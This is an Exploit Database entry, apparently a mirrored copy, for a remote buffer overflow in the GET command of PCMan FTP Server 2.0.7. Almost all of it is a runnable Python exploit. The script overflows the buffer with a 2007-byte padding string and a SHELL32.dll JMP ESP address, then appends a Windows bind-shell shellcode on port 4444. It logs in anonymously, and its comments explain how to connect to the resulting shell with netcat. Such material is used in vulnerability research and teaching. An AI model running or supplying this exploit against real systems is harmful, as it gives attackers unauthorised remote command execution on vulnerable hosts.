PCMan FTP Server 2.0.7 – ‘GET’ Remote Buffer Overflow

• Exploit Database
• 36 阅读

• 作者： Koby
  日期： 2015-08-29
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/38003/

• #!/usr/bin/python
  
  # Exploit Title: PCMan's FTP Server v2.0 - GET command buffer overflow (remote shell)
  # Date:28 Aug 2015
  # Exploit Author: Koby
  # Vendor Homepage: http://pcman.openfoundry.org/
  # Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
  # Version: 2.0.7
  # Tested on: Windows XP SP3
  # CVE : N/A
  
  import socket
  import sys
  
  # msfvenom -p windows/shell_bind_tcp lhost=192.168.1.130 lport=4444 -b '\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d' -f ruby
  # Payload size: 352 bytes
  shellcode = (
  "\x29\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" 
  "\x0e\x69\x8c\x9b\xa3\x83\xee\xfc\xe2\xf4\x95\x64\x19\xa3" 
  "\x69\x8c\xfb\x2a\x8c\xbd\x5b\xc7\xe2\xdc\xab\x28\x3b\x80" 
  "\x10\xf1\x7d\x07\xe9\x8b\x66\x3b\xd1\x85\x58\x73\x37\x9f" 
  "\x08\xf0\x99\x8f\x49\x4d\x54\xae\x68\x4b\x79\x51\x3b\xdb" 
  "\x10\xf1\x79\x07\xd1\x9f\xe2\xc0\x8a\xdb\x8a\xc4\x9a\x72" 
  "\x38\x07\xc2\x83\x68\x5f\x10\xea\x71\x6f\xa1\xea\xe2\xb8" 
  "\x10\xa2\xbf\xbd\x64\x0f\xa8\x43\x96\xa2\xae\xb4\x7b\xd6" 
  "\x9f\x8f\xe6\x5b\x52\xf1\xbf\xd6\x8d\xd4\x10\xfb\x4d\x8d" 
  "\x48\xc5\xe2\x80\xd0\x28\x31\x90\x9a\x70\xe2\x88\x10\xa2" 
  "\xb9\x05\xdf\x87\x4d\xd7\xc0\xc2\x30\xd6\xca\x5c\x89\xd3" 
  "\xc4\xf9\xe2\x9e\x70\x2e\x34\xe4\xa8\x91\x69\x8c\xf3\xd4" 
  "\x1a\xbe\xc4\xf7\x01\xc0\xec\x85\x6e\x73\x4e\x1b\xf9\x8d" 
  "\x9b\xa3\x40\x48\xcf\xf3\x01\xa5\x1b\xc8\x69\x73\x4e\xc9" 
  "\x61\xd5\xcb\x41\x94\xcc\xcb\xe3\x39\xe4\x71\xac\xb6\x6c" 
  "\x64\x76\xfe\xe4\x99\xa3\x78\xd0\x12\x45\x03\x9c\xcd\xf4" 
  "\x01\x4e\x40\x94\x0e\x73\x4e\xf4\x01\x3b\x72\x9b\x96\x73" 
  "\x4e\xf4\x01\xf8\x77\x98\x88\x73\x4e\xf4\xfe\xe4\xee\xcd" 
  "\x24\xed\x64\x76\x01\xef\xf6\xc7\x69\x05\x78\xf4\x3e\xdb" 
  "\xaa\x55\x03\x9e\xc2\xf5\x8b\x71\xfd\x64\x2d\xa8\xa7\xa2" 
  "\x68\x01\xdf\x87\x79\x4a\x9b\xe7\x3d\xdc\xcd\xf5\x3f\xca" 
  "\xcd\xed\x3f\xda\xc8\xf5\x01\xf5\x57\x9c\xef\x73\x4e\x2a" 
  "\x89\xc2\xcd\xe5\x96\xbc\xf3\xab\xee\x91\xfb\x5c\xbc\x37" 
  "\x6b\x16\xcb\xda\xf3\x05\xfc\x31\x06\x5c\xbc\xb0\x9d\xdf" 
  "\x63\x0c\x60\x43\x1c\x89\x20\xe4\x7a\xfe\xf4\xc9\x69\xdf" 
  "\x64\x76")
  
  
  # buffer overflow was found by fuzzing with ftp_pre_post (metasploit)
  # bad data is a string of 2007 "A" characters to get to an EIP overwrite
  # followed by the JMP ESP instruction 0x7c9d30eb in SHELL32.dll
  baddata = '\x41'*2007+'\xeb\x30\x9d\x7c'
  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  
  # change target IP/port as needed
  # run this script then to connect use nc for your windows shell
  # nc [target IP address] 4444
  connect=s.connect(('192.168.1.135',21))
  s.recv(1024)
  s.send('USER anonymous\r\n')
  s.recv(1024)
  s.send('PASS anonymous\r\n')
  s.recv(1024)
  s.send('GET ' + baddata +'\x90'*15+ shellcode+ '\r\n')
  s.close()